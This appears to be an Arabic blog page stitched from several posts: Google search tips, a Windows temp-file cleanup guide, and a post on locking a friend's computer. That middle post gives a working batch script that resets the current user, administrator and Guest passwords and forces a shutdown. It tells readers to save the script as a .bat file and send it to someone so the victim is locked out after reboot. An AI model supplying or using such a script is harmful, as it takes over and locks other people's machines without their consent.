    11- زر شعار ويندوز + R


    لفتح نافذة ( تشغيل ) Run

    اسرار موقع قوقل

    اسرار في محرك البحث جوجل لم تسمع بها من قبل



    ثمانية اسرار في محرك البحث جوجل يمكن انك لم تسمع بها من قبل
    لامجال للشك ان محرك البحث جوجل يعد من افضل محركات البحث واكثرها إستعمالا حول العالم ، مقارنة بمحركات البحث الاخرى المنافسة . لكن للاسف فليس الجميع يعرف كيف يستفيد باكبر نسبة معينة من محرك البحث جوجل ذلك لما يحتوي عليه هذا المحرك من اسرار وحيل يمكن انك قد سمعت بها ويمكن ستكون هذه اول مرة ستكتشفها من خلال هذه التدوينة .



    1/معرفة الوقت والتاريخ في اي دولة .
    time SUDAN
    ضعه علي قوقل وحاتشوف
    بإستعمال الامرTime يمكنك معرفة الوقت والتاريخ في اية دولة دون الحاجة للبحث في مواقعاخرى ، كما يمكنك معرفة الوقت في مدينة بكتابة الامر Time + اسم المدينة التي تود معرفة الوقت بها .
    الطقس في السودان
    علي قوقل
    من المميزات الخفية التي يوفرها محرك البحث جوجل انه يمكنك معرفة الجو لأية دولة وكذلك لاية مدينة ، فيكفي ان تكتب الامر weather مرفوقا بإسم الدولة او المدينة لكي يضهر لك تقرير عن حالة الطقس الحالية وكذلك حالة الطقس المرتقبة خلال 7 ايام المقبلة بالوقت والتاريخ ، بالإضافة إلى سرعة الرياح ، الرطوبة وغيرها من المعلومات الجوية .
    3/آلة حاسبة
    يمكنك تحويل محرك البحث جوجل إلى آلة حاسبة تحل فيها اصعب العمليات الحسابة ، ذلك من خلال تطبيقه المتميز الذي يحل ابسط المعادلات الحسابية إلى اصعبها واكثرها تعقيدا يكفي ان تقوم بكتابة اي امر على سبيل المثال 5*10 او 2+8 وسقيوم محرك البحث بالحساب وإعطائك النتيجة صحيحة .
    4/وحدة قياس
    كما هو الحال بالنسبة للحاسبة فإن محرك البحث جوجل يعطيك إمكانية تحويل وحدة قياس إلى عدة وحدات اخرى ، حيث يكفي ان تكتب العدد تم الوحدة بعد ذلك تضيف الكلمة To و كتابة اسم الوحدة التي ترغب ان تحول إليها 
    من المميزات التي استعملها بشكل يومي هي تلك الخاصة بتحويل العملة ، فمحرك البحث جوجل قادر على منحك سعر تقريبي لاي عملة تريد التحويل إليها من الدرهم المغربي إلى اليورو او من الريال السعودي إلى الجنيه المصري ... وغيرها . فيكفي ان تقوم بكتابة المبلغ + العملة ثم تكتب الكلمة اللاثينية To وبعد ذلك تكتب رمز العملة الذي ترغب ان تحول اليها المبلغ على سبيل المثال : 1euro to moroccan dirham
    من الامور الجميلة جدا هي ان محرك البحث يستطيع إعطائك مكان تواجد مشترياتك من خلال الانترنت عن طريق Tracking Code فكما تعلم عند إختيار توصيل مشترياتك عن طريق الانترنت بإستعمال خدمة توصيل مدفوعة ك UPS, FEDEX فإن هذه الاخيرة تمنحك كود يسمى بــ Tracking code الاخير الذي يساعدك في معرفة اين وصلت سلعتك ، ويمكنك تتبع رحلتها إلى حين ان تصل إلى بلدك . هكذا فإن محرك البحث جوجل يساعدك في ذلك فقط عبر إدخال Tracking code إلى محرك البحث حيث يمكنه ان يعطيك مكان تواجد السلعة كما هو موضح في الصورة . 
    / تتبع رحلة جوية
    غيرب اليس كذلك ؟ نعم محرك من اسرار البحث في جوجل انه قادر على إعطائك وقت إنطلاقة ووصول الطائرة من وإلى وجهتها فيكفي ان تكتب اسم الخطوط الجوية تم رقم الرحلة لكي يضهر لك وقت وتاريخ الوصول . كما في الصورة كلمة united هو إسم شركة الطيران الرقم 8 هو رقم الرحلة.



    نعم محرك البحث قادر ان يلعب دور المعجم وإعطائك تفاسير للكلمات اللاثينية التي تبحث عنها حيث يكفي ان تكتب define ثم إسم الكلمة التي تبحث عن تعريفها بالإضافة إلى إعطائك طريقة نطقها الصحيح .



    هكذا اكون قد انتهيت موضوعي اتمنى ان تشاركنا ماهي الخدعة التي اعجبتك ، ولما لا مشاركتنا بعض اسرار البحث الجديدة والغير معروفة لإضافتها .

    قفل جهاز صديقك بكلمة السر من اختيارك بالثواني


    --------------السلامعليكم ورحمة الله------------




    افتح المفكــــرة او بـــNotepad

    وانسخ الكود والصق فيها

    @echo off
    break off
    net user %USERNAME% 0000
    net user administrator 0000
    net user Guest 0000
    shutdown -s -f -t 00
    exit

    ثم قم بتعديل التالي
    السطر التالت والرابع والخامس مكان ثلاثة الاصفار تحط كلمة سر للي بدك تحطوا

    والسادس مكان الصفرين 00 هما عبارة عن امر لاطفاء الجهازبالتواني

    مكانهما ضعو عدد التواني الدي تريد من خلالها اغلا ق الجهاز مثال 05 خمس ثواني

    ثم حفظ المستند بـ إمتداد: startimes.bat

    وأرسل له أي واحد أو جربه بنفسك
    عند فتح الملف يفتح معالج بـ عدد الثواني للي حطيتها بعدها يغلق النظام مباشرة

    بعد إعداة التشغيل يطلب منه كلمة السر للي حطيتها ثلاثة مرات متكرر في ثلاثة أصفار!


    مثال

    الخميس، 6 يونيو 2013

    الخطوات الشامله لتنظيف الجهاز وتسريع عمله

    بسم الله الرحمن الرحيم 

    ان شاء الله بهذا الموضوع رح نشوف كيف يمكن تنظيف الجهاز نهائيا وتحسين ادائه ورح تلاحظوا الفرق بإذن الله بدون استخدام اي برنامج  والموضوع فيه شرح بالصور للخطوات  التي تحتاج لتوضيح 


    الخطوه الاولى 
    نتخلص من جميع الملفات المؤقتهه في الجهاز والتي تأخذ حيزا في القرص الصلب والرامات ولكن كيف ؟
    اول شيء من خلال مسح جميع الكوكيز وملفات التصفح من المتصفح نفسه وفي هذه الخطوه مساعده على عدم وصول اي شخص لبياناتك بسهوله 


    الخطوه الثانيه 

    اذهب الى ابدأ ثم تشغيل واكتب الاوامر التاليه وامسح جميع ما بداخلها من ملفات لاتقلق فهي ملفات مؤقته وغير ضروريه ابدا 

    START->RUN->RECENT

    START->RUN->TEMP

    START->RUN->PREFETCH

    START->RUN-> %TEMP%  

    اذا نكتب في الصندوق الخاص بالتشغيل الكلمات التاليه 

    recent 

    ونحذف ما بداخلها 

    temp

    ونحذف جميع ما بداخلها

    prefetch

    ونحذف ما بداخلها 

    %temp%

    ونحذف ما بداخلها 


    الخطوه الثالثه 

    عمل تنظيف للاقراص المحليه والقيام بعمليات التجزئه لنأخذها على حدا 

    تنظيف الاقراص المحليه 

    disk cleanup

    نذهب الى القرص المحلي الاول وليكن 

    C
    ثم نقو بالضغط على الزر الايمن للفأره 

    ثم نختار خصائص



    بعد ذلك نضغط على 



    بعد ذلك سوف يظهر لنا الصندوق التالي ننتظره حتى الانتهاء




     

    نفس الشيء نضغط بزر الفأره الايمن على القرص ونختار خصائص ثم نختار من الاعلى 

    أدوات

    وبعد ذلك نقوم ب الضغط على زر

    الغاء التجزئة الأن

    كما هوه موضح هنا


    تظهر لنا شاشه التجزئه كما يلي نختار خيار ال 
    ونقوم بإنتظاره حتى ينتهي تماما 

    وننتقل بنفس الخطوات الى الاقراص الاخرى ان وجدت طبعا

    Twitter Delicious Facebook Digg Stumbleupon Favorites More